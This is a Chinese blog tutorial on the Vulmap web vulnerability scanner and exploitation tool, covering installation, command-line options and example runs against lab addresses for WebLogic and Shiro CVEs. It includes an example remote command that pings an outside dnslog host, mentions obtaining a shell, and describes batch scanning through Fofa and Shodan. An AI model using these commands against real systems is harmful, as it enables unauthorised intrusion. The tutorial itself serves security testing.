您当前的位置: 首页 > 

星球守护者

暂无认证

  • 3浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

漏洞扫描工具-Vulmap的介绍和使用

星球守护者 发布时间:2021-02-18 11:43:00 ,浏览量:3

文章目录
      • 下载地址
      • 软件介绍
      • 安装步骤
      • 参数选项
      • 漏洞利用
      • 指定线程
      • 支持的漏洞库
      • 摘抄

下载地址

https://github.com/zhzyker/vulmap 在这里插入图片描述

git clonehttps://github.com/zhzyker/vulmap.git

在这里插入图片描述

软件介绍
  • Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能,
  • 目前支持的 webapps 包括 activemq, flink, shiro, solr, struts2, tomcat, unomi, drupal, elasticsearch, fastjson, jenkins, nexus, weblogic, jboss, spring, thinkphp
  • Vulmap 将漏洞扫描与验证(漏洞利用)结合到了一起, 及大程度便于测试人员在发现漏洞后及时进行下一步操作, 工具追求于于高效、便捷

高效: 逐步开发中慢慢引入了批量扫描、Fofa、Shodan 批量扫描, 且支持多线程默认开启协程, 以最快的速度扫描大量资产 便捷: 发现漏洞即可利用, 大量资产扫描可多格式输出结果

安装步骤

1、安装依赖库

pip3 install -r requirements.txt

在这里插入图片描述

2.安装完成

python3 vulmap.py

在这里插入图片描述

3.检测漏洞

python3 vulmap.py -u http://192.168.232.146:7001

在这里插入图片描述

4.输入目标地址

python3 vulmap.py -u http://192.168.232.146:7001 -v CVE-2020-14882

在这里插入图片描述

5.利用模块,获取shell全向 在这里插入图片描述

参数选项

python3 vulmap.py -h-h, --help 显示此帮助消息并退出 在这里插入图片描述

-u URL, --url URL 目标 URL (e.g. -u "http://example.com")
-f FILE, --file FILE 选择一个目标列表文件,每个url必须用行来区分 (e.g. -f "/home/user/list.txt")
--fofa keyword 使用 fofa api 批量扫描 (e.g. --fofa "app=Apache-Shiro")
--shodan keyword 使用 shodan api 批量扫描 (e.g. --shodan "Shiro")
-m MODE, --mode MODE 模式支持"poc"和"exp",可以省略此选项,默认进入"poc"模式
-a APP [APP ...] 指定 webapps(e.g. "weblogic")不指定则自动指纹识别
-c CMD, --cmd CMD 自定义远程命令执行执行的命令,默认是echo随机md5
-v VULN, --vuln VULN 利用漏洞,需要指定漏洞编号 (e.g. -v "CVE-2019-2729")
-t NUM, --thread NUM 扫描线程数量,默认10线程
--output-text file 扫描结果输出到 txt 文件 (e.g. "result.txt")
--output-json file 扫描结果输出到 json 文件 (e.g. "result.json")
--proxy-socks SOCKS 使用 socks 代理 (e.g. --proxy-socks 127.0.0.1:1080)
--proxy-http HTTP 使用 http 代理 (e.g. --proxy-http 127.0.0.1:8080)
--user-agent UA 允许自定义 User-Agent
--fofa-size SIZE fofa api 调用资产数量,默认100,可用(1-10000)
--delay DELAY 延时时间,每隔多久发送一次,默认 0s
--timeout TIMEOUT 超时时间,默认 5s
--list 显示支持的漏洞列表
--debug exp 模式显示 request 和 responses, poc 模式显示扫描漏洞列表
漏洞利用
python3 vulmap.py -f url.txt -o 123.txt
-f FILE, --file FILE 选择一个目标列表文件,每个url必须用行来区分 (e.g. -f "/home/user/list.txt")
-o FILE, --output-text file 扫描结果输出到 txt 文件 (e.g. "result.txt")
-m MODE, --mode MODE 模式支持"poc"和"exp",可以省略此选项,默认进入"poc"模式

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

python3 vulmap.py -u http://192.168.8.132:8080/login -v CVE-2016-4437
-u URL, --url URL 目标 URL (e.g. -u "http://example.com")
-v VULN, --vuln VULN 利用漏洞,需要指定漏洞编号 (e.g. -v "CVE-2019-2729")指定漏洞的扫描

在这里插入图片描述 在这里插入图片描述

python3 vulmap.py -f url.txt -a shiro
-f FILE, --file FILE 选择一个目标列表文件,每个url必须用行来区分 (e.g. -f "/home/user/list.txt"
-a APP [APP ...] 指定 webapps(e.g. "weblogic")不指定则自动指纹识别
python3 vulmap.py -f url.txt -a shiro -c "ping 9mzwv9.dnslog.cn"
-c CMD, --cmd CMD 自定义远程命令执行执行的命令,默认是echo随机md5

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

指定线程
python3 vulmap.py -f url.txt -t 30
-t NUM, --thread NUM 扫描线程数量,默认10线程

在这里插入图片描述

支持的漏洞库
python3 vulmap.py --list例子批量扫描

在这里插入图片描述 在这里插入图片描述

+-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Target type       | Vuln Name        | Poc | Exp | Impact Version && Vulnerability description                 |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Apache ActiveMQ   | CVE-2015-5254    |  Y  |  N  |             
关注
打赏
1662051426
查看更多评论
0.0553s